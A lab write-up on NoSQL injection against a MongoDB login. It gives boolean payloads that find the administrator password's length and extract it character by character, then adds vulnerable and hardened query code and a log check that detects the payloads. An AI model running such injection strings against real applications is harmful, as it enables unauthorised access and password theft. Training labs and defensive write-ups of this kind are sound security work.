02 Lab: Exploiting NoSQL injection to extract data
Objective
The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.
To solve the lab, log into the application as the administrator user. You can log in to your own account using the following credentials: wiener:peter.
Solution
We change the user parameter to:
administrator' && this.password.length < 30 || 'a'=='b
and then to:
administrator' && this.password[$0$]=='$a$

The password is 8 characters long.

Position  Character
5         c
2         q
3         q
7         d
1         f
6         z
0         n
4         v
User: administrator Password: nfqqvczd
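
The payloads above only work when the user value is concatenated into a server-side JavaScript expression. The following is an added example, not code from the lab or from this page: it assumes a hypothetical $where lookup and shows it beside a hardened filter builder and a log check run on constructed inputs (all function and field names are assumptions).

```javascript
// Added example: assumed server-side lookup code, not taken from the lab.
// Field name (username) and all function names are hypothetical.

// Vulnerable: input is concatenated into a JavaScript $where expression,
// so a quote in the input ends the string literal and the rest runs as code.
function buildUserFilterVulnerable(user) {
  return { $where: "this.username == '" + user + "'" };
}

// Hardened: no server-side JavaScript; the input is only ever a string value
// compared with $eq, so quotes and operators have no special meaning.
function buildUserFilterSafe(user) {
  if (typeof user !== 'string') {
    throw new TypeError('username must be a string'); // blocks {"$ne": ...} objects
  }
  if (!/^[A-Za-z0-9_.-]{1,64}$/.test(user)) {
    throw new RangeError('username has unexpected characters');
  }
  return { username: { $eq: user } };
}

// Log check: flags values that close a quoted string and chain boolean logic,
// or that reference the current document through `this.`.
function looksLikeWhereInjection(value) {
  if (typeof value !== 'string') return true;
  return /'\s*(&&|\|\|)/.test(value) || /\bthis\.[A-Za-z_]/.test(value);
}

// Constructed sample inputs: a normal login plus the two payload shapes from
// this page (the $0$ / $a$ markers are replaced with the constructed values 0 and a).
const samples = [
  "wiener",
  "administrator' && this.password.length < 30 || 'a'=='b",
  "administrator' && this.password[0]=='a",
];

function classify(values) {
  return values.map((v) => {
    let safeFilter = null;
    try { safeFilter = buildUserFilterSafe(v); } catch (e) { /* rejected by validation */ }
    return { value: v, flagged: looksLikeWhereInjection(v), accepted: safeFilter !== null };
  });
}

console.log(classify(samples));
```

Setting security.javascriptEnabled to false in the mongod configuration disables $where evaluation entirely, which removes this class of injection even if a concatenated query is missed in review.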
